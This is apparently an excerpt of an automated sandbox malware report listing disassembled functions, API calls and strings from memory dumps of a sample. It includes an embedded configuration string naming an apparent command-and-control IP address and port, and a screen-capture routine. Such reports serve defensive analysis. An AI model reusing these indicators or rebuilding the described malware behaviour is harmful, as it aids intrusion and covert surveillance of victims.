                                          • __getptd.LIBCMT ref: 032BDC28
                                            • Part of subcall function 032B93AB: __getptd_noexit.LIBCMT ref: 032B93AE
                                            • Part of subcall function 032B93AB: __amsg_exit.LIBCMT ref: 032B93BB
                                          • __getptd.LIBCMT ref: 032BDC3F
                                          • __amsg_exit.LIBCMT ref: 032BDC4D
                                          • __lock.LIBCMT ref: 032BDC5D
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 032BDC71
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: 7e5a8f231e34eb9e22e54707d2784e1f31056cbd1d730f0eb4eb8eac984f07f4
                                          • Instruction ID: 2adac8f584cf5c705caffba3a4520b371a3c9a2bf61375f5a7312379a8fc582e
                                          • Opcode Fuzzy Hash: 7e5a8f231e34eb9e22e54707d2784e1f31056cbd1d730f0eb4eb8eac984f07f4
                                          • Instruction Fuzzy Hash: D7F09036924B109AE720FF789802BDD77B0AF407E4F188149D6516F1C1CFF595C1CA95
                                          APIs
                                          • __getptd.LIBCMT ref: 02F0E25B
                                            • Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
                                            • Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE
                                          • __getptd.LIBCMT ref: 02F0E272
                                          • __amsg_exit.LIBCMT ref: 02F0E280
                                          • __lock.LIBCMT ref: 02F0E290
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 02F0E2A4
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: ebfb0181292ac289b0d5b5b32306ec79510727e74572f2a87836eccbd5c50ebc
                                          • Instruction ID: 8f8f0ab373c5e09d73a9901e6da50d5dbdb26659107a9f0fd5d530c29aea08bc
                                          • Opcode Fuzzy Hash: ebfb0181292ac289b0d5b5b32306ec79510727e74572f2a87836eccbd5c50ebc
                                          • Instruction Fuzzy Hash: A5F02432E45300DBE730BBF49D81B4D73A16F08BE0F01450ADB486B1C1CBA04841FE51
                                          APIs
                                          • __getptd.LIBCMT ref: 6C3D8F0B
                                            • Part of subcall function 6C3D9165: __getptd_noexit.LIBCMT ref: 6C3D9168
                                            • Part of subcall function 6C3D9165: __amsg_exit.LIBCMT ref: 6C3D9175
                                          • __getptd.LIBCMT ref: 6C3D8F22
                                          • __amsg_exit.LIBCMT ref: 6C3D8F30
                                          • __lock.LIBCMT ref: 6C3D8F40
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 6C3D8F54
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: 1850ba5f8fa9c53f41582350c5004f3b9b4ae2c47d4f429ea5fa3c445bd5739d
                                          • Instruction ID: 8e217e006a69ac6ad6ad6cc363ef117aceb22a1b86ed9a8a97ece5b954d4fb25
                                          • Opcode Fuzzy Hash: 1850ba5f8fa9c53f41582350c5004f3b9b4ae2c47d4f429ea5fa3c445bd5739d
                                          • Instruction Fuzzy Hash: E1F06233D05700AAE621AB689405B8A73A5AF0176CF23510AD494A6FC0CF357945CE97
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 03D88AD2
                                          • GetCommandLineW.KERNEL32 ref: 03D88AD8
                                          • GetStartupInfoW.KERNEL32(?), ref: 03D88AE7
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 03D88B0F
                                          • ExitProcess.KERNEL32 ref: 03D88B17
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                          • String ID:
                                          • API String ID: 3421218197-0
                                          • Opcode ID: 56f233135b2d6d59a07ef80145853e0bf372abac146b4f01403fe2929769d7e1
                                          • Instruction ID: d20076a0f4b6e71b5975c077fc290b20235b23e91abadbcb73d2fd48a841e4c4
                                          • Opcode Fuzzy Hash: 56f233135b2d6d59a07ef80145853e0bf372abac146b4f01403fe2929769d7e1
                                          • Instruction Fuzzy Hash: BCF09073584319FBE720ABA0DC4DF997778EB04B10F100694B315AA1C4EA70AA48CF54
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 03D97602
                                          • GetCommandLineW.KERNEL32 ref: 03D97608
                                          • GetStartupInfoW.KERNEL32(?), ref: 03D97617
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 03D9763F
                                          • ExitProcess.KERNEL32 ref: 03D97647
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                          • String ID:
                                          • API String ID: 3421218197-0
                                          • Opcode ID: 34e83d5ce8656076c145a56b6fc7304ac1dcfa762b15a7bfc77a13dbd3e4dad4
                                          • Instruction ID: 9b5b2290c890a1ba1e2e5d593be65674f5b18b71a4567dbfba8770e888978be1
                                          • Opcode Fuzzy Hash: 34e83d5ce8656076c145a56b6fc7304ac1dcfa762b15a7bfc77a13dbd3e4dad4
                                          • Instruction Fuzzy Hash: 02F03073544318FBEB20ABA4DC4DFEA7778EB04B11F100694B715AA1D4EA70AA89CF54
                                          APIs
                                            • Part of subcall function 03DA0870: _doexit.LIBCMT ref: 03DA087C
                                          • ___set_flsgetvalue.LIBCMT ref: 03D9AE95
                                            • Part of subcall function 03DA288A: TlsGetValue.KERNEL32(00000000,03DA29E3,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000), ref: 03DA2893
                                            • Part of subcall function 03DA288A: DecodePointer.KERNEL32(?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000,?,03DA2AF0,0000000D), ref: 03DA28A5
                                            • Part of subcall function 03DA288A: TlsSetValue.KERNEL32(00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000,?,03DA2AF0), ref: 03DA28B4
                                          • ___fls_getvalue@4.LIBCMT ref: 03D9AEA0
                                            • Part of subcall function 03DA286A: TlsGetValue.KERNEL32(?,?,03D9AEA5,00000000), ref: 03DA2878
                                          • ___fls_setvalue@8.LIBCMT ref: 03D9AEB3
                                            • Part of subcall function 03DA28BE: DecodePointer.KERNEL32(?,?,?,03D9AEB8,00000000,?,00000000), ref: 03DA28CF
                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 03D9AEBC
                                          • ExitThread.KERNEL32 ref: 03D9AEC3
                                          • GetCurrentThreadId.KERNEL32 ref: 03D9AEC9
                                          • __freefls@4.LIBCMT ref: 03D9AEE9
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                          • String ID:
                                          • API String ID: 781180411-0
                                          • Opcode ID: ede2ae841235e28e7656a58f035172416733e6f0644d78b1fc483717ea0addec
                                          • Instruction ID: f055cce3ff1a4d004d738d336cac2d4e2f512436804ec1d95e880b2a820ea7ec
                                          • Opcode Fuzzy Hash: ede2ae841235e28e7656a58f035172416733e6f0644d78b1fc483717ea0addec
                                          • Instruction Fuzzy Hash: F0E04F2BC00B0AABDF09B7F68A0898F362CDE01790B040D10FD009B104FB24D90146B2
                                          APIs
                                            • Part of subcall function 02F08400: _doexit.LIBCMT ref: 02F0840C
                                          • ___set_flsgetvalue.LIBCMT ref: 02F072CC
                                            • Part of subcall function 02F09823: TlsGetValue.KERNEL32(00000000,02F0997C,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000), ref: 02F0982C
                                            • Part of subcall function 02F09823: DecodePointer.KERNEL32(?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89,0000000D), ref: 02F0983E
                                            • Part of subcall function 02F09823: TlsSetValue.KERNEL32(00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89), ref: 02F0984D
                                          • ___fls_getvalue@4.LIBCMT ref: 02F072D7
                                            • Part of subcall function 02F09803: TlsGetValue.KERNEL32(?,?,02F072DC,00000000), ref: 02F09811
                                          • ___fls_setvalue@8.LIBCMT ref: 02F072EA
                                            • Part of subcall function 02F09857: DecodePointer.KERNEL32(?,?,?,02F072EF,00000000,?,00000000), ref: 02F09868
                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 02F072F3
                                          • ExitThread.KERNEL32 ref: 02F072FA
                                          • GetCurrentThreadId.KERNEL32 ref: 02F07300
                                          • __freefls@4.LIBCMT ref: 02F07320
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                          • String ID:
                                          • API String ID: 781180411-0
                                          • Opcode ID: 22e2b160d835f9f5b986fa4dea95e60b9237c095cab8022cf2fb42d6f555d81c
                                          • Instruction ID: a5d0dc5a18c712988016d3ab46eaea531e39c4bc12257e1bedeffd7ac5d086ee
                                          • Opcode Fuzzy Hash: 22e2b160d835f9f5b986fa4dea95e60b9237c095cab8022cf2fb42d6f555d81c
                                          • Instruction Fuzzy Hash: F6E0BF31C402096BDF0137F19D98E5F769E9D40BD4BD14450EF10972C2FB68A412AEEA
                                          APIs
                                          • _sprintf.LIBCMT ref: 6C36FE83
                                            • Part of subcall function 6C3D26E0: __atof_l.LIBCMT ref: 6C3D26EA
                                          • _sprintf.LIBCMT ref: 6C37017F
                                          Strings
                                          • Unknown parameter: '%s'Context: ', xrefs: 6C370171
                                          • Couldn't get parameter %d due to end of line., xrefs: 6C36FE7D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$__atof_l
                                          • String ID: Couldn't get parameter %d due to end of line.$Unknown parameter: '%s'Context: '
                                          • API String ID: 2076877804-16269964
                                          • Opcode ID: 2f8442d17c0498e4bdf37f5b9169d5a31273de9019df251268e7761eec3b6b3c
                                          • Instruction ID: 953cd01fb5d01a118a4e9c2419316bee991d286a85f4e6ba63fafcff37a554a5
                                          • Opcode Fuzzy Hash: 2f8442d17c0498e4bdf37f5b9169d5a31273de9019df251268e7761eec3b6b3c
                                          • Instruction Fuzzy Hash: BAB1663250D2818EE721CE39C4443DEBBA5AB8B32CF10491ED4D59BE85C77B8449CFA6
                                          APIs
                                          • std::exception::exception.LIBCMT ref: 03D9125D
                                          • __CxxThrowException@8.LIBCMT ref: 03D91274
                                          Strings
                                          • corrupted regex pattern, xrefs: 03D91255
                                          • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 03D90F5E, 03D90F84
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Exception@8Throwstd::exception::exception
                                          • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$corrupted regex pattern
                                          • API String ID: 3728558374-3133971423
                                          • Opcode ID: 7af9138d2d317927b9761a15dfc2ffb5f3e035cd6e0766759e99843b28900444
                                          • Instruction ID: a7a7799f4831365b11144f60457de18e89bc40613e1195518dce6f57a8301443
                                          • Opcode Fuzzy Hash: 7af9138d2d317927b9761a15dfc2ffb5f3e035cd6e0766759e99843b28900444
                                          • Instruction Fuzzy Hash: CEB1D635604242AFEF14DF14D4C47A6BBE5AF85710F4C85AEDC8A9F24AC370E949C762
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D92B2C
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
                                            • Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2
                                          • _memmove.LIBCMT ref: 03D92B84
                                          • _memmove.LIBCMT ref: 03D92BAA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memmovestd::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                          • String ID: vector<T> too long
                                          • API String ID: 2063937883-3788999226
                                          • Opcode ID: d326fede0b3af9cb3e4c8236f7bc7709e3fccdac82f1a58e71322efec01b45e5
                                          • Instruction ID: ac002d7414b536119d75c69526e6cb9e77d05abb7782eeddce1423b4c58b1d44
                                          • Opcode Fuzzy Hash: d326fede0b3af9cb3e4c8236f7bc7709e3fccdac82f1a58e71322efec01b45e5
                                          • Instruction Fuzzy Hash: 7B41CBB6A007089FDF18DF68D891A7FB7F5EB84710F148A2EE45697744DB35A900C7A0
                                          APIs
                                          Strings
                                          • invalid string position, xrefs: 03D8C07E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: StrxfrmXinvalid_argument_memmovestd::_
                                          • String ID: invalid string position
                                          • API String ID: 3306385690-1799206989
                                          • Opcode ID: 2a77438561c9af4b98a4d3ac76fa5c4789486c5e4a4dde86d6c64980b9a1a45c
                                          • Instruction ID: 31fa0f9893f2cf94b34fc1cbf0f61ffbca12a0b055f77887f737234fd6586096
                                          • Opcode Fuzzy Hash: 2a77438561c9af4b98a4d3ac76fa5c4789486c5e4a4dde86d6c64980b9a1a45c
                                          • Instruction Fuzzy Hash: 1F417E71710244DBD724EF6CC840B6EF7EAEB40A54F144A1EE4A28B684D7B6F94487A0
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8C2C8
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
                                            • Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8C2E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                          • String ID: string too long
                                          • API String ID: 963545896-2556327735
                                          • Opcode ID: f07da6f6c34060d43a924fe30270db5dee42a2f3cbf3135a229c9725abb168c0
                                          • Instruction ID: db5587c6ba22165a66d56ef853c4b1bc12d7dfc2faa527f5a3609e4565e4ea2f
                                          • Opcode Fuzzy Hash: f07da6f6c34060d43a924fe30270db5dee42a2f3cbf3135a229c9725abb168c0
                                          • Instruction Fuzzy Hash: F221A832B14740DFD331EF6C98C092EF7E9EF66A10B14065EE4928B691C7B1B8458371
                                          APIs
                                            • Part of subcall function 03D96940: GetDesktopWindow.USER32 ref: 03D9695F
                                            • Part of subcall function 03D96940: GetDC.USER32(00000000), ref: 03D9696C
                                            • Part of subcall function 03D96940: CreateCompatibleDC.GDI32(00000000), ref: 03D96972
                                            • Part of subcall function 03D96940: GetDC.USER32(00000000), ref: 03D9697D
                                            • Part of subcall function 03D96940: GetDeviceCaps.GDI32(00000000,00000008), ref: 03D9698A
                                            • Part of subcall function 03D96940: GetDeviceCaps.GDI32(00000000,00000076), ref: 03D96992
                                            • Part of subcall function 03D96940: ReleaseDC.USER32(00000000,00000000), ref: 03D969A3
                                            • Part of subcall function 03D96940: GetSystemMetrics.USER32(0000004C), ref: 03D96A48
                                            • Part of subcall function 03D96940: GetSystemMetrics.USER32(0000004D), ref: 03D96A5D
                                            • Part of subcall function 03D96940: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 03D96A76
                                            • Part of subcall function 03D96940: SelectObject.GDI32(?,00000000), ref: 03D96A84
                                            • Part of subcall function 03D96940: SetStretchBltMode.GDI32(?,00000003), ref: 03D96A90
                                            • Part of subcall function 03D96940: GetSystemMetrics.USER32(0000004F), ref: 03D96A9D
                                            • Part of subcall function 03D96940: GetSystemMetrics.USER32(0000004E), ref: 03D96AB0
                                          • _memmove.LIBCMT ref: 03D95F16
                                            • Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC
                                          • _memset.LIBCMT ref: 03D95EA1
                                          • swprintf.LIBCMT ref: 03D95EC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memmove_memsetswprintf
                                          • String ID: %s %s
                                          • API String ID: 1388310237-581060391
                                          • Opcode ID: 137d03e06b2c177d6dc0a4f2ad0761d40211cd874068409d2c800625b616da39
                                          • Instruction ID: 68fabc57d5c1916977f54ec596347f00071493665beacdf197e83d9accddfb83
                                          • Opcode Fuzzy Hash: 137d03e06b2c177d6dc0a4f2ad0761d40211cd874068409d2c800625b616da39
                                          • Instruction Fuzzy Hash: 6321D3B6A04300ABE712EF15A880E5FB7E9EFD5714F04092EF8895B241E6719918C7B3
                                          APIs
                                          Strings
                                          • /Astro[%d 0 0 -%d 0 0]sf, xrefs: 6C3C8EE2
                                          • /Courier[%d 0 0 -%d 0 0]sf, xrefs: 6C3C8F00
                                          • /Times-Roman[%d 0 0 -%d 0 0]sf, xrefs: 6C3C8EF5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _fprintf
                                          • String ID: /Astro[%d 0 0 -%d 0 0]sf$/Courier[%d 0 0 -%d 0 0]sf$/Times-Roman[%d 0 0 -%d 0 0]sf
                                          • API String ID: 1654120334-2185384684
                                          • Opcode ID: 7dd01853f40d986085f16deb8636820d1d69dea4829ec5b66024498c0d29ad77
                                          • Instruction ID: 509d1a8a868a2a836890ec2e5bd8c6061db15bdb397d69fa7e1fa55f6f4caae2
                                          • Opcode Fuzzy Hash: 7dd01853f40d986085f16deb8636820d1d69dea4829ec5b66024498c0d29ad77
                                          • Instruction Fuzzy Hash: EDF02032B44228AAEB10F728CC02FAE606AD32A30CF118517F814E3980D3669D850E93
                                          APIs
                                          • lstrlenW.KERNEL32(|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,02F07899,?,?,?,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F063C6
                                            • Part of subcall function 02F05E30: _memset.LIBCMT ref: 02F05E61
                                          • CreateThread.KERNEL32(00000000,00000000,02F06110,00000000,00000000,00000000), ref: 02F063EE
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,02F07899,?,?,?,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F063FC
                                          Strings
                                          • |p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02F063C1
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CreateObjectSingleThreadWait_memsetlstrlen
                                          • String ID: |p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                          • API String ID: 2656291350-4171861867
                                          • Opcode ID: dc50a521f217a4255df46e5706373d0c9d22b0b757026c16c3dd30f698b871fd
                                          • Instruction ID: d1bf967008552fe1c51652ffeca811d67880c8d937b5a638fc4cd16e3fda2622
                                          • Opcode Fuzzy Hash: dc50a521f217a4255df46e5706373d0c9d22b0b757026c16c3dd30f698b871fd
                                          • Instruction Fuzzy Hash: EBF06534EC131DAAFB2057949D8EF09B368A700FD1FD14A11F305D91C8D7F0A5719A15
                                          APIs
                                          • DecodePointer.KERNEL32(?,6C3D6F3D,00000000,00000000,00000000,00000000,00000000,6C3EE8EC,?,6C3DB838,00000003,6C3D37EE,00000001,00000000,00000000), ref: 6C3D6F0F
                                          • __invoke_watson.LIBCMT ref: 6C3D6F2B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
